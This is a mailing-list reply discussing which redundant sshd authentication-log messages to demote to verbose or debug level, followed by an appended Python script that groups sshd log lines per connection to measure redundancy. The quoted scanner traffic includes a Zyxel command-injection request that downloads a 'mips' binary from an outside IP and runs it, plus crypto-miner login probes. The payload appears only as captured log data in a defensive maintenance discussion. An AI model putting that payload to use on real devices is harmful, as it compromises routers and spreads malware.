On 2023/08/18 17:39, Tobias Heider wrote:
> Hi,
> 
> I was looking at my authlog today and as expected on a server exposed on the
> public internet it is filled with random scanners and brute force attacks.
> One thing I noticed is that there is a lot of information we log multiple
> times for each failed connection.
> 
> Some examples below:
> 
> sshd[6216]: error: kex_exchange_identification: banner line contains invalid characters
> sshd[6216]: banner exchange: Connection from xx.97.73.149 port 64744: invalid format
> sshd[68416]: error: kex_exchange_identification: banner line contains invalid characters
> sshd[68416]: banner exchange: Connection from xx.97.73.149 port 63955: invalid format
> 
> There are a few more parsing errors like this that result in printing the exact
> error followed by 'goto invalid', which causes the more general "invalid format"
> message. I think "invalid format" is enough information in most cases.
> 
> sshd[50752]: error: kex_exchange_identification: Connection closed by remote host
> sshd[50752]: Connection closed by xx.94.81.243 port 61000
> 
> Same as above, the kex_exchange_identification doesn't really add anything.
> 
> sshd[51579]: Invalid user tom from xx.134.191.142 port 35480
> sshd[51579]: Received disconnect from xx.134.191.142 port 35480:11: Bye Bye [preauth]
> sshd[51579]: Disconnected from invalid user tom xx.134.191.142 port 35480 [preauth]
> sshd[94857]: Invalid user long from xx.97.173.1 port 51140
> sshd[94857]: Received disconnect from xx.97.173.1 port 51140:11: Bye Bye [preauth]
> sshd[94857]: Disconnected from invalid user long xx.97.173.1 port 51140 [preauth]
> 
> Here the "Disconnected" line contains all the info from "Invalid user" line.
> Those invalid user messages make up the largest part of my log file,
> so deduplicating them makes a huge difference.
> 
> Below is a diff to make some of those log at debug level if the same information
> is also logged elsewhere.
> Is there some general interest in diffs to clean this up a bit?

There are some messages which don't show up in the "Disconnected from"
line which may possibly give some clues about the source of connections,
so might be of interest. If someone does want to log them, going all
the way to debug is going to result in a *lot* more useless lines being
logged.

So if they are getting squelched I think they would be better under verbose
rather than debug.

examples...

sshd[2722]: Connection from 20.168.51.56 port 54850 on 195.95.187.26 port 22 rdomain "0"
sshd[2722]: error: Received disconnect from 20.168.51.56 port 54850:3: com.jcraft.jsch.JSchException: Auth fail [preauth]
sshd[2722]: Disconnected from authenticating user root 20.168.51.56 port 54850 [preauth]

sshd[50247]: Connection from 218.92.0.22 port 36077 on 195.95.187.184 port 22 rdomain "0"
sshd[50247]: Received disconnect from 218.92.0.22 port 36077:11:  [preauth]
sshd[50247]: Disconnected from authenticating user root 218.92.0.22 port 36077 [preauth]

sshd[12117]: Connection from 222.71.84.234 port 53262 on 195.95.187.26 port 22 rdomain "0"
sshd[12117]: Invalid user A@0599343813A@0599343813A@0599343813 from 222.71.84.234 port 53262
sshd[12117]: Received disconnect from 222.71.84.234 port 53262:11: Normal Shutdown, Thank you for playing [preauth]
sshd[12117]: Disconnected from invalid user A@0599343813A@0599343813A@0599343813 222.71.84.234 port 53262 [preauth]

sshd[83269]: Connection from 143.244.50.173 port 46078 on 195.95.187.28 port 22 rdomain "0"
sshd[83269]: Invalid user admin from 143.244.50.173 port 46078
sshd[83269]: Received disconnect from 143.244.50.173 port 46078:11: end [preauth]
sshd[83269]: Disconnected from invalid user admin 143.244.50.173 port 46078 [preauth]

and I have all sorts in "kex_exchange_identification: client sent invalid protocol identifier"

   1 "CONNECT api.ipify.org:443 HTTP/1.1"
   1 "GET / HTTP/1.0"
   1 "GET /.git/HEAD HTTP/1.1"
   1 "GET /0bef HTTP/1.0"
   1 "GET /CSS/Miniweb.css HTTP/1.1"
   1 "GET /HNAP1 HTTP/1.1"
   1 "GET /Portal0000.htm HTTP/1.1"
   1 "GET /__Additional HTTP/1.1"
   1 "GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://146.19.191.108/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;";
   1 "GET /evox/about HTTP/1.1"
   1 "GET /jPOS HTTP/1.1"
   1 "GET /manager/html HTTP/1.1"
   1 "GET /manager/text/list HTTP/1.1"
   1 "GET /start.cfm HTTP/1.1"
   1 "HEAD / HTTP/1.1"
   1 "POST /sdk HTTP/1.1"
   1 "SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1"
   1 "\376^H\001adminSSH-2.0-PuTTY_Release_0.78"
   1 "{"id": 1, "method": "mining.subscribe", "params": ["MinerName/1.0.0", "EthereumStratum/1.0.0"]}"
   1 "{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.5.1"]}"
   1 "{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46Rgo4egSbN6bXvDAdu9HGAzqHdWrote1L1yiptBRySqNzMZtDbhbSf9dQLUcgpy6GBcwfvuJn54JVTK4vDGetKFMeoM4XZ","pass":"x","agent":"XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019","algo":["cn/"
   1 "{"id":1,"method":"eth_submitLogin","worker":"igwrcvap","params":["0xb850910e0ebe0f93976921effa663a647e50de4b","x"],"jsonrpc":"2.0"}"
   2 "CONNECT google.com:443 HTTP/1.1"
   2 "GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://103.110.33.164/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;";
   2 "POST / HTTP/1.1"
   2 "\376^H\001adminSSH-2.0-OpenSSH_7.4"
   3 "GET /.env HTTP/1.1"
   3 "GET /private/api/v1/service/premaster HTTP/1.1"
   4 "REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0"
  27 "MGLNDD_xx"
  31 "GET / HTTP/1.1"
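
The redundancy argument in the thread can be checked mechanically rather than by eye. The script below is an added example (my own code, not OpenSSH's and not from either poster): it groups sshd lines by PID, treats each PID as one connection, and reports for every line which facts no later line of the same connection repeats, so a line with nothing left is pure duplication and a line that keeps something (the disconnect code and reason, the rdomain, the kex "banner line" detail) is what squelching would cost. The regular expressions assume only the message shapes quoted above; the sample log is constructed with documentation addresses and invented PIDs, and the field names (ustate, code, reason, ident and so on) are mine.

```python
"""Correlate sshd auth-log lines per connection and measure what each line adds.

Added example for this thread, not code from OpenSSH or from either poster.
It assumes the message shapes sshd logs as quoted in the thread; the sample
log below is constructed (RFC 5737 addresses, invented PIDs), not real traffic.
"""
import re
from collections import Counter, defaultdict

# Constructed sample log modelled on the messages quoted in the thread.
SAMPLE_LOG = """\
sshd[6216]: error: kex_exchange_identification: banner line contains invalid characters
sshd[6216]: banner exchange: Connection from 192.0.2.10 port 64744: invalid format
sshd[50752]: error: kex_exchange_identification: Connection closed by remote host
sshd[50752]: Connection closed by 192.0.2.11 port 61000
sshd[51579]: Invalid user tom from 192.0.2.12 port 35480
sshd[51579]: Received disconnect from 192.0.2.12 port 35480:11: Bye Bye [preauth]
sshd[51579]: Disconnected from invalid user tom 192.0.2.12 port 35480 [preauth]
sshd[2722]: Connection from 192.0.2.13 port 54850 on 198.51.100.1 port 22 rdomain "0"
sshd[2722]: error: Received disconnect from 192.0.2.13 port 54850:3: com.jcraft.jsch.JSchException: Auth fail [preauth]
sshd[2722]: Disconnected from authenticating user root 192.0.2.13 port 54850 [preauth]
sshd[50247]: Received disconnect from 192.0.2.14 port 36077:11:  [preauth]
sshd[50247]: Disconnected from authenticating user root 192.0.2.14 port 36077 [preauth]
sshd[7001]: error: kex_exchange_identification: client sent invalid protocol identifier "GET / HTTP/1.1"
sshd[7002]: error: kex_exchange_identification: client sent invalid protocol identifier "GET / HTTP/1.1"
sshd[7003]: error: kex_exchange_identification: client sent invalid protocol identifier "MGLNDD_xx"
"""

PID_RE = re.compile(r"sshd\[(\d+)\]: (.*)$")

# Each pattern names the facts a message carries; group names become field names
# (these names are my own choice, not anything sshd emits).
PATTERNS = [
    re.compile(r"error: kex_exchange_identification: banner line (?P<detail>.+)$"),
    re.compile(r"banner exchange: Connection from (?P<src>\S+) port (?P<sport>\d+): "
               r"(?P<outcome>invalid format)$"),
    re.compile(r"error: kex_exchange_identification: Connection (?P<outcome>closed) by remote host$"),
    re.compile(r"Connection (?P<outcome>closed) by (?P<src>\S+) port (?P<sport>\d+)$"),
    re.compile(r"(?P<ustate>Invalid) user (?P<user>\S+) from (?P<src>\S+) port (?P<sport>\d+)$"),
    re.compile(r"(?:error: )?Received disconnect from (?P<src>\S+) port (?P<sport>\d+):"
               r"(?P<code>\d+):\s*(?P<reason>.*?)\s*\[preauth\]$"),
    re.compile(r"Disconnected from (?P<ustate>invalid|authenticating) user (?P<user>\S+) "
               r"(?P<src>\S+) port (?P<sport>\d+) \[preauth\]$"),
    re.compile(r"Connection from (?P<src>\S+) port (?P<sport>\d+) on (?P<dst>\S+) "
               r"port (?P<dport>\d+) rdomain (?P<rdomain>\S+)$"),
    re.compile(r'error: kex_exchange_identification: client sent invalid protocol '
               r'identifier "(?P<ident>.*)"$'),
]


def extract(msg):
    """Return the facts in one message as {field: value}; {} if the shape is unknown."""
    for pat in PATTERNS:
        m = pat.match(msg)
        if m:
            fields = m.groupdict()
            if "ustate" in fields:  # "Invalid user" and "invalid user" are the same fact
                fields["ustate"] = fields["ustate"].lower()
            return fields
    return {}


def parse(log):
    """Group (message, fields) per sshd PID in log order; one PID is one connection."""
    conns = defaultdict(list)
    for line in log.splitlines():
        m = PID_RE.search(line)  # search, so a syslog timestamp/host prefix is tolerated
        if m:
            pid, msg = m.groups()
            conns[pid].append((msg, extract(msg)))
    return conns


def novel_fields(log):
    """Map (pid, message) -> the fields no later line of the same connection repeats.

    Later lines win because the final "Disconnected from ..." line is the one the
    thread proposes to keep; an empty set means the line adds nothing to the log.
    """
    novel = {}
    for pid, entries in parse(log).items():
        for i, (msg, fields) in enumerate(entries):
            later = set()
            for _, f in entries[i + 1:]:
                later |= set(f.items())
            novel[(pid, msg)] = {k for k, v in fields.items() if (k, v) not in later}
    return novel


def redundant_lines(log):
    """Parsed lines whose every fact a later line of the same connection repeats."""
    parsed = {(pid, msg): f for pid, entries in parse(log).items() for msg, f in entries}
    return [f"sshd[{pid}]: {msg}" for (pid, msg), nov in novel_fields(log).items()
            if parsed[(pid, msg)] and not nov]


def identifier_histogram(log):
    """Count the non-SSH protocol identifiers scanners sent, like `sort | uniq -c`."""
    return Counter(f["ident"] for entries in parse(log).values()
                   for _, f in entries if "ident" in f)


if __name__ == "__main__":
    for line in redundant_lines(SAMPLE_LOG):
        print("redundant:", line)
    for (pid, msg), nov in novel_fields(SAMPLE_LOG).items():
        if nov:
            print(f"sshd[{pid}] keeps {sorted(nov)} from: {msg}")
    for ident, n in identifier_histogram(SAMPLE_LOG).most_common():
        print(f"{n:4} {ident!r}")
```

On the constructed sample this flags exactly the two lines Tobias called pure duplication, the "Invalid user" line and the kex "Connection closed by remote host" line, while the "Received disconnect" lines keep their code and reason text, the verbose "Connection from ... rdomain" line keeps the destination address and rdomain, and the "banner line contains invalid characters" line keeps its detail string; those are the fields a log consumer loses if the lines move to debug. Real auth logs carry a syslog timestamp and hostname in front of "sshd[...]", which the PID search already accepts.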
